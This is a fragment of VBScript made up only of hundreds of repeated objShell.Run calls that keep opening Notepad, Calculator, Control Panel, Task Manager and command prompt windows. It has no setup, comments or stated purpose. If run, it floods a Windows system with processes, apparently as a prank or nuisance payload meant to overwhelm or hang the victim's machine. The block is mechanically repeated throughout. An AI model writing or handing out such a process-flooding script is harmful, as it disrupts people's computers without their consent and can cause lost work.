objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
